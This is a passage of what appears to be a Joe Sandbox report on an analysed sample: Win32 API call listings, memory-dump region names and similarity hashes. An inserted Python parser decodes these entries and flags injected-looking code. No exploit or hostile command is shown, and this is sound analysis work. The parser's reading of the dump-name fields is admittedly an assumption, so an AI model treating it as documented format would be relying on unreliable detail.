• Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$Long
• String ID:
• API String ID: 847901565-0
• Opcode ID: 5babba463e4d4f1ef671c57eae21f2d4bada37783e566ddeef5cccaea0beb623
• Instruction ID: 7804c79530c27c3fa5ee2eaa23b4fe5c783d96847af03140a7ec0e58830e3eef
• Opcode Fuzzy Hash: 5babba463e4d4f1ef671c57eae21f2d4bada37783e566ddeef5cccaea0beb623
• Instruction Fuzzy Hash: 8F11B431605655AFCB109F68CC04ABA3BA5BF46368F154B28F835D72F0E7309DA0CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00001060,?,00000004), ref: 001656BB
• _wcslen.LIBCMT ref: 001656CD
• _wcslen.LIBCMT ref: 001656D8
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00165816
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID:
• API String ID: 455545452-0
• Opcode ID: a837161a102c23f3c7c95c7a6dade8a02e7ad48fd1016553ef13ddb178021759
• Instruction ID: 6fac774a4bdb6ab7770013de6f68749c4b00960e19944655e76b691318b685ce
• Opcode Fuzzy Hash: a837161a102c23f3c7c95c7a6dade8a02e7ad48fd1016553ef13ddb178021759
• Instruction Fuzzy Hash: 53110475A00609A6DF20DF65CC85AFE77BDEF11764F10406AFA15D6181EBB4CA90CB60
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 483b0992702f45c1e0736e02a20e8c0bb7565a379ff33bafa29d6d39fa455738
• Instruction ID: 3b12239be372a50e1da74d79727f739375410775cc320cb70f7bc37456b5adfb
• Opcode Fuzzy Hash: 483b0992702f45c1e0736e02a20e8c0bb7565a379ff33bafa29d6d39fa455738
• Instruction Fuzzy Hash: C901ADB220961A7EF62126F86CC8F67665CEF523B8F310325F9A1A11D2EBF48C405260
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00131A47
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00131A59
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00131A6F
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00131A8A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: d57f57e3938be05fc11ed1d9c99070a18e5ac12b807d3bf6f47b4f723f148b0c
• Instruction ID: fa73a50cf7cad395ff3c18c8dda50a67516d3a4fc069d55924440f5b988593b1
• Opcode Fuzzy Hash: d57f57e3938be05fc11ed1d9c99070a18e5ac12b807d3bf6f47b4f723f148b0c
• Instruction Fuzzy Hash: 4511093AD01219FFEB11DBA5CD85FADBB79EB08750F200091EA05B7290D7716E50DB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0013E1FD
• MessageBoxW.USER32(?,?,?,?), ref: 0013E230
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0013E246
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0013E24D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                                                                                          • Opcode ID: 5e67c6b806449970ddccf4929286f7cbfed09c5e8998df5b57876c939bcec16e
                                                                                                                                                                                                                                          • Instruction ID: 5d4dd42e90d4dd8dac0a840e48c19f0be775eb6a76e635ff838ef6bcb1e842e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e67c6b806449970ddccf4929286f7cbfed09c5e8998df5b57876c939bcec16e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F11D676904358BBCB119FA8AC09AAF7FEDAF46320F044255F925E36D1D7B0DD448BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,000FCFF9,00000000,00000004,00000000), ref: 000FD218
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000FD224
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000FD22B
                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 000FD249
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                                                                          • Opcode ID: fbea73638ca7c61c7dbdd7694afb833e85055f859d6f5841e12b790e352543b6
                                                                                                                                                                                                                                          • Instruction ID: a5126c3af959730bc2a00dbf5a18d5c3df3059c355cd22b34678f816acd21d1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbea73638ca7c61c7dbdd7694afb833e85055f859d6f5841e12b790e352543b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01DB3640510C7BD7615BA5DC05BBE7B5AEF92331F10021AFA25955D1CB718941E6E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00169F31
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00169F3B
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00169F46
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00169F7A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                                                                                          • Opcode ID: 03e724c9d975784abda307941701b6bbdc2462461f2093655ced60bca118ddf1
                                                                                                                                                                                                                                          • Instruction ID: 8dc61404abedc75d916e420f89c828dd693a0206e04829d91cffc2b366b92aed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03e724c9d975784abda307941701b6bbdc2462461f2093655ced60bca118ddf1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211363690012AABDB00DFA8CC459FE7BBDFB05311F014495F902E3140D770BAA1CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 000D6060
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                                                                                          • Opcode ID: d3548355135883c5d808e40ed398475edd60da1ae049cf832a78916cfdc994d7
                                                                                                                                                                                                                                          • Instruction ID: e2795ea5193f1aa24297e29fa6d3fd3d3a9f7e921514a77b8fa83c786642755e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3548355135883c5d808e40ed398475edd60da1ae049cf832a78916cfdc994d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9116172501609BFEF125F94DC54EEB7FA9EF19364F044116FA1452210D776ECA0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
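The function records above follow one fixed text layout (an APIs list with call-site addresses, the .sdmp dump region the code was lifted from, and the Similarity identifiers). As an added example (not Joe Sandbox code), the Python below parses such records into structured data, decodes the Win32 constants visible in the arguments (WM_SETFONT, DEFAULT_GUI_FONT, WM_SETCURSOR) and splits the .sdmp name into base address, page protection and memory type, so a triager can separate code lifted from a mapped image from code lifted from private executable memory. The meaning of the .sdmp name fields beyond the base address is an assumption inferred from the regions on this page (code at 0x20, headers and .rsrc at 0x02, .data at 0x04, all 0x01000000); the sample text is constructed from the entries shown above.

```python
"""Parse Joe Sandbox function-signature entries (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Documented Windows SDK values (winnt.h, winuser.h, wingdi.h).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}
# (API name, zero-based argument index) -> {raw value: symbolic name}
ARG_NAMES = {("SendMessageW", 1): {0x30: "WM_SETFONT"},
             ("DefDlgProcW", 1): {0x20: "WM_SETCURSOR"},
             ("GetStockObject", 0): {0x11: "DEFAULT_GUI_FONT"},
             ("WaitForSingleObject", 1): {0xFFFFFFFF: "INFINITE"}}

API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                    r"([\w:]+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
# ASSUMPTION: in the .sdmp name, field 4 is the region base, field 5 the PAGE_*
# protection and field 7 the MEM_* type. Consistent with every region on this page,
# but not documented here, so the decoded names are a best-effort label.
SDMP_RE = re.compile(r"\d+\.\d+\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\."
                     r"[0-9A-Fa-f]{8}\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]          # None where the report shows '?'
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # set for 'Part of subcall function X' lines

    def describe(self) -> str:
        out = []
        for i, a in enumerate(self.args):
            if a is None:
                out.append("?")
                continue
            sym = ARG_NAMES.get((self.name, i), {}).get(a)
            out.append(f"{a:#x}" + (f" /*{sym}*/" if sym else ""))
        return f"{self.name}({', '.join(out)}) @ {self.ref:#x}"


@dataclass
class DumpRegion:
    base: int
    protect: str
    mem_type: str


@dataclass
class Entry:
    calls: List[ApiCall] = field(default_factory=list)
    source: Optional[DumpRegion] = None
    associated: List[DumpRegion] = field(default_factory=list)
    api_id: str = ""


def parse_sdmp(text: str) -> DumpRegion:
    """Find the .sdmp name in a line; tolerates the 'Download File' link text that
    the HTML export fuses onto the name."""
    m = SDMP_RE.search(text)
    if not m:
        raise ValueError(f"no .sdmp name in: {text!r}")
    prot, mtype = int(m.group(2), 16), int(m.group(3), 16)
    return DumpRegion(int(m.group(1), 16), PAGE_PROTECT.get(prot, f"{prot:#x}"),
                      MEM_TYPE.get(mtype, f"{mtype:#x}"))


def parse_entries(report: str) -> List[Entry]:
    entries, cur = [], None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every function record starts here
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            sub, name, mod, args, ref = m.groups()
            argv = [] if args is None else [None if a.strip() == "?" else int(a, 16)
                                            for a in args.split(",") if a.strip()]
            cur.calls.append(ApiCall(name, mod, argv, int(ref, 16),
                                     int(sub, 16) if sub else None))
        elif line.startswith("• Source File:"):
            cur.source = parse_sdmp(line)
        elif line.startswith("• Associated:"):
            cur.associated.append(parse_sdmp(line))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
    return entries


def is_image_code(e: Entry) -> bool:
    """True when the function was lifted from an executable page of a mapped image,
    rather than from private/mapped memory of the kind injected code usually occupies."""
    return (e.source is not None and e.source.mem_type == "MEM_IMAGE"
            and e.source.protect.startswith("PAGE_EXECUTE"))


# Constructed sample: two records copied in the shape used by the report above.
SAMPLE = """APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
• GetStockObject.GDI32(00000011), ref: 000D6060
• SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: CreateMessageObjectSendStockWindow
APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• GetClientRect.USER32(?,?), ref: 00169F31
• GetCursorPos.USER32(?), ref: 00169F3B
• ScreenToClient.USER32(?,?), ref: 00169F46
• DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00169F7A
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
"""

if __name__ == "__main__":
    for entry in parse_entries(SAMPLE):
        print(entry.api_id, "image-backed code:", is_image_code(entry))
        for call in entry.calls:
            print("   ", call.describe())
```

With the constants decoded, the first record reads as window creation followed by WM_SETFONT with the default GUI font, and the second as a WM_SETCURSOR handler; is_image_code() is the filter to apply when a report mixes records lifted from the mapped image with records lifted from allocated memory, since only the latter need the extra attention an injected region deserves.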

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 000F3B56
  • Part of subcall function 000F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 000F3AD2
  • Part of subcall function 000F3AA3: ___AdjustPointer.LIBCMT ref: 000F3AED
• _UnwindNestedFrames.LIBCMT ref: 000F3B6B
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 000F3B7C
• CallCatchBlock.LIBVCRUNTIME ref: 000F3BA4
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 737400349-0
                                                                                                                                                                                                                                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                                                                                                                          • Instruction ID: 2840e0953ef0bdcbc05edc996215d854e8e01506410a3055e98ac56be5bfc024
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D73210014DBBDF125E95CC46EFB7BA9EF98764F044015FF4866522C736E961EBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000D13C6,00000000,00000000,?,0010301A,000D13C6,00000000,00000000,00000000,?,0010328B,00000006,FlsSetValue), ref: 001030A5
• GetLastError.KERNEL32(?,0010301A,000D13C6,00000000,00000000,00000000,?,0010328B,00000006,FlsSetValue,00172290,FlsSetValue,00000000,00000364,?,00102E46), ref: 001030B1
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0010301A,000D13C6,00000000,00000000,00000000,?,0010328B,00000006,FlsSetValue,00172290,FlsSetValue,00000000), ref: 001030BF
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 6b875dfe3f4d26c98dc52c4b3563e2487adf7259c2dfdcc7886e50ea4dba3ccb
• Instruction ID: 56aac5cd34da8eeebd6498c990c692ca364f91e0dba5aa582808d0075fec129f
• Opcode Fuzzy Hash: 6b875dfe3f4d26c98dc52c4b3563e2487adf7259c2dfdcc7886e50ea4dba3ccb
• Instruction Fuzzy Hash: F7012B32313322ABCB314B799C449777B9CAF05B71B114624F9A5E36C4D7A1D941C6F0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0013747F
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00137497
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001374AC
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001374CA
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: 970e27f64058dde18c51938372d6a28cbb8b0a83368d6d2746f91ced8d4c7f9a
• Instruction ID: ced082eb440f37c620b870e12dfdc248ed6b0aea32cc249b3373bb1751b2df9e
• Opcode Fuzzy Hash: 970e27f64058dde18c51938372d6a28cbb8b0a83368d6d2746f91ced8d4c7f9a
• Instruction Fuzzy Hash: 3B1161F52093159BE730CF54EC09BA27BFCEB00B04F108569E65AD6591D7B0F944DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowRect.USER32(?,?), ref: 00167E33
• ScreenToClient.USER32(?,?), ref: 00167E4B
• ScreenToClient.USER32(?,?), ref: 00167E6F
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00167E8A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 389bd468efe8f95b6614df86c319685e704ba81a86e44d5dea60a3dbdf4d621e
• Instruction ID: 7b89720dbddd61c6ae17cef2d5e5b9a7a4cbe4935ee5db997d159da8d4012d07
• Opcode Fuzzy Hash: 389bd468efe8f95b6614df86c319685e704ba81a86e44d5dea60a3dbdf4d621e
• Instruction Fuzzy Hash: 901186B9D0024AAFDB41CF98C8849EEBBF5FF08310F504056E951E3610D775AA94CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00132DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00132DD6
• GetCurrentThreadId.KERNEL32 ref: 00132DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00132DE4
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 671e351a1a0496bdd39d5e632621772705e52af35992073338899cb34ee9ab23
• Instruction ID: 9aea3dbcac6f8e2bdab60844ff22cf468225a9eafbcda262083e8f8eb8baf70d
• Opcode Fuzzy Hash: 671e351a1a0496bdd39d5e632621772705e52af35992073338899cb34ee9ab23
• Instruction Fuzzy Hash: 73E0ED71501224BADB202BA2DC0DEFB7E6CEF56BA1F410115F506D15909AE58981C6F1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E9693
  • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96A2
  • Part of subcall function 000E9639: BeginPath.GDI32(?), ref: 000E96B9
  • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96E2
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00168887
